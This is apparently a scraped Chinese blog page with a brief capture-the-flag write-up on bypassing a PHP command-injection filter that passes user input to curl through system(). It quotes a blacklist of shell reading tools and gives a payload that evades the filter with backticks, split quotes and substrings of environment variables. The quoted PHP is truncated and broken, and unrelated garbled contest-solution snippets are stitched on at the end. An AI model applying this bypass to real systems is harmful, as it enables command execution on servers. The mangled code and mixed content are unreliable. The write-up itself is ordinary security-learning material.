知識點:**審計&&命令注入原始碼:
<?php
show_source(__file__);
$host = $_get['host'];
if(preg_match('/cat|tac|more|less|head|tail|nl|sort|grep|uniq|sed|awk|od|strings|\s/is', $host))
if(preg_match('/f.*?l.*?a.*?g/is', $host))
if(preg_match('/;|\||\(|\[|>|
system("timeout 2 curl $host");
payload:"$apache_confdir"$1$1`%26%26ca""t$$d$a$c$b
用到的技巧:
可見$var|cut -c本身就含有被過濾的字元,所以我們採用expr substr來截系統內本身的變數。利用env命令:得到了如圖
看到其中$apache_confdir=/etc/apache2,我們從第乙個位置開始截乙個字元,便是(/),再加上反引號讓它執行得到/。放入第四個變數。
最後輸入我們的payload,得到flag!
對於菜雞來說,相當的加深了對於命令拼接和繞過的認識。加油!
hpu 第二次積分賽
問題a 因子個數 分析 很是尷尬,上去 就用了暴力求解。自己在測試的時候都能夠明顯感覺到,n大的時候答案出來 慢,所以就知道了肯定超時啊 之後就在想會有什麼巧妙的方法呢。中間嘗試了好多的辦法,當時居然都被我否定了。最後也沒有出來 看到題解之後,發現,是和我當時想的一種方法是一樣的,不知道當時是怎麼 ...
第二次周賽題解
e題,不懂的看新生訓練題解 includeint main return 0 d題,乙個預處理就ok includeint a 1000005 int main int t scanf d t while t return 0 c題,打表找下規律,會發現是以1 1 2 0 2 2 1 0為迴圈 in...
第二次周賽B
有乙隻經過訓練的蜜蜂只能爬向右側相鄰的蜂房,不能反向爬行。請程式設計計算蜜蜂從蜂房a爬到蜂房b的可能路線數。其中,蜂房的結構如下所示。input 輸入資料的第一行是乙個整數n,表示測試例項的個數,然後是n 行資料,每行包含兩個整數a和b 0sample input 21 2 3 6sample ou...